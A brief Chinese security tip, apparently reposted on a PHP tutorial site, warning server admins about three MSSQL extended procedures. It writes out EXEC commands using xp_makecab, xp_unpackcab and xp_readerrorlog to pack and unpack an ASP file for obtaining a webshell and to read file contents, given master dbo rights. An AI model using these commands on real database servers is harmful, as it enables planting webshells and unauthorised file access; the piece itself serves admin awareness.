网站地图    收藏   

主页 > 后端 > 网站安全 >

注意3个MSSQL扩展,可被用来获取WEBSHELL - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] EXEC [master].[dbo].[xp_makecab] lsquo;c:\test.rarrsquo;,#39;defaultrsquo;,1,rsquo;d:\cmd.asprsquo;打包EXEC [master].[dbo].[xp_unpackcab] lsquo;C:\test.rarrsquo;,#39;c:rsquo;,1, ls......

EXEC [master].[dbo].[xp_makecab] ‘c:\test.rar’,'default’,1,’d:\cmd.asp

打包

EXEC [master].[dbo].[xp_unpackcab] ‘C:\test.rar’,'c:’,1, ‘n.asp’

解包,

可以用于得到webshell EXEC [master].[dbo].[xp_readerrorlog] 1,’d:\cmd.asp’

读文本代码

要求权限: master的dbo权限

服务器管理要注意这几个扩展了

 

from:webshell.cc

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论